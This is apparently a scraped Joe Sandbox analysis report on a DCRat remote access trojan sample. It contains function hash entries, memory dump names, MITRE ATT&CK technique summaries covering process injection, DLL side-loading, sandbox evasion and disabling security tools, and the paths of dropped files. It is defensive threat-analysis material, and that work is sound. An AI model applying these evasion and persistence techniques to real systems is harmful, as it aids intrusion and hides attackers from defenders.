Opcode ID: 1c1c2fc2f614400afc7861cea9c74a06ca3a48c59020dd27f285223754e4f5a6
Instruction ID: 0c40be4368598a6858e4976a3a12c7f2c0cfcdf0970ecec00ac2aa90f8623987
Opcode Fuzzy Hash: 1c1c2fc2f614400afc7861cea9c74a06ca3a48c59020dd27f285223754e4f5a6
Instruction Fuzzy Hash: FBE01220F09A1A47FBE49544D8A0BA97265EF54301F1652B8D54F933E1CD38AF44C746

Function 00007FFD9BB7AC38 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2925956594.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bb70000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0aa1f20c2579d633238b845180d01604034f2a476654d48ca55d5a2145d36489
Instruction ID: 9d819305951d478748565e90d888d45cce40a6a4750594b8f4dafcdd9b4529a4
Opcode Fuzzy Hash: 0aa1f20c2579d633238b845180d01604034f2a476654d48ca55d5a2145d36489
Instruction Fuzzy Hash: B9D0C930B619084FCB5CA62C88A996472D1FB6921679540A9D00EC76F1E96AD989C741

Function 00007FFD9BB7F358 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2925956594.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bb70000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0669b107a9e5f84ff6df61cfa085f332f6089b48b0213cdb3e89e4831b5e43b3
Instruction ID: 7ea87081fc33aedb903302615f03e00ced15204609cbbd5fca1a2ae1a288fbe4
Opcode Fuzzy Hash: 0669b107a9e5f84ff6df61cfa085f332f6089b48b0213cdb3e89e4831b5e43b3
Instruction Fuzzy Hash: 1BD0C930B61D084F8B5CA62C885996072E2EB6D216BA541A9D00AC72B5E96AD989C741

Function 00007FFD9B780B9D Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2923297192.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b780000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d3100f1d73544b6d7750cc4bee107f60b1d2f65f6fa2b703a318a81b2c845b6
Instruction ID: 8fa656445edadefc7b84523edac7b82ca46c1e7bb5fa3049979b5c5fc82a2565
Opcode Fuzzy Hash: 7d3100f1d73544b6d7750cc4bee107f60b1d2f65f6fa2b703a318a81b2c845b6
Instruction Fuzzy Hash: D0C0123062990E8FDA40BB28C888824BBA0FB4E202BDA00E4E00CCB1B1D62998909704

Function 00007FFD9B7806A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2923297192.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b780000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f385cb86ca1661c4f2e1f57ae6232f9eb834de6f892b1153d04bcfe9d1e2ab2
Instruction ID: 58c17159de69ebc0fad01cabf82fc321eb3c2f76e1dd093f4406c8fd5141a2e5
Opcode Fuzzy Hash: 5f385cb86ca1661c4f2e1f57ae6232f9eb834de6f892b1153d04bcfe9d1e2ab2
Instruction Fuzzy Hash: 4CC00205F5BE1E01E42572AA54A60ADB1405FD5B22FE70272D509841B1986E22960196

Function 00007FFD9BB72E8B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2925956594.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bb70000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 946f660fa8d3f1e4629de67ace701c36310d68d95ca80a72a73c9635ee4bd3cc
Instruction ID: 39af62b281741469b4512aa78dad1591c5ead9d58d40430980d1346acd9b741c
Opcode Fuzzy Hash: 946f660fa8d3f1e4629de67ace701c36310d68d95ca80a72a73c9635ee4bd3cc
Instruction Fuzzy Hash: 3DD09250B0F50B89F23986C181B063D61A1EF06308E62047EC09F42CF1C91D7B02A212

Function 00007FFD9B787165 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2923297192.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b780000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba1dc07140365ffb07a78c2db4e41eeda99c4e453e081e34b5e4fd9f84435b8b
Instruction ID: 8264f18ffba8775fba8c54d31dcd8e8be958da507a3c77b55ac5079747bb4ed3
Opcode Fuzzy Hash: ba1dc07140365ffb07a78c2db4e41eeda99c4e453e081e34b5e4fd9f84435b8b
Instruction Fuzzy Hash: 94C04C11F18C2A46F75A765444756BE04435F54704F9502B4E41F977EECD1C5F0202CA

Function 00007FFD9B7806C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2923297192.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b780000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce31640aa32ed8f1bedd4a0d005b38809c64bcd8d093074238d8c7d7e6528b0b
Instruction ID: d3aaf2922f35f7e2413e54daeeb6db4f85818b0ed321f4c786d147fcca8a2291
Opcode Fuzzy Hash: ce31640aa32ed8f1bedd4a0d005b38809c64bcd8d093074238d8c7d7e6528b0b
Instruction Fuzzy Hash: 81B01200D57D0F00E42432FA08E206970405F44321FC30270D40C801B1985E13950282

Function 00007FFD9BB7239F Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2925956594.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9bb70000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 218a8c22eb33f617a308b15c44c2962614e1fd73847b1f8a9027724668250afc
Instruction ID: 580d176c3193700812471e818babf4badcff9bf24503fe05d3abd4d69a403cee
Opcode Fuzzy Hash: 218a8c22eb33f617a308b15c44c2962614e1fd73847b1f8a9027724668250afc
Instruction Fuzzy Hash: 62C04844F0F38A6BEB3615E408F107C16A0AF27208B970672D10E9A6F3E84CAA459661

Function 00007FFD9B7847BC Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2923297192.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b780000_WBnjVTGHzbhirvM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9af273b16d3f83d1f9aad3dc8d2ec6007d67945d0958983c25d11b4576795d42
Instruction ID: 1f1f052a7ab48d6409cedbbda78b61747a5d4c289373e7d721a70ad732d4124e
Opcode Fuzzy Hash: 9af273b16d3f83d1f9aad3dc8d2ec6007d67945d0958983c25d11b4576795d42
Instruction Fuzzy Hash:

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 0V2JsCrGUB.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Recovery\24dbde2999530e

C:\Recovery\2f08a7aa5b4dd8

C:\Recovery\WBnjVTGHzbhirvM.exe

C:\Recovery\WmiPrvSE.exe

C:\Users\Default\Favorites\2f08a7aa5b4dd8

C:\Users\Default\Favorites\WBnjVTGHzbhirvM.exe

C:\Users\Public\Desktop\2f08a7aa5b4dd8

C:\Users\Public\Desktop\WBnjVTGHzbhirvM.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MsAgentDriverruntime.exe.log

C:\Users\user\AppData\Local\Temp\1rr3mmHPcD

C:\Users\user\AppData\Local\Temp\ani1HH9Yqa.bat

C:\Users\user\Desktop\GWwNmKBL.log

C:\Users\user\Desktop\PinddLxP.log

Windows Analysis Report
0V2JsCrGUB.exe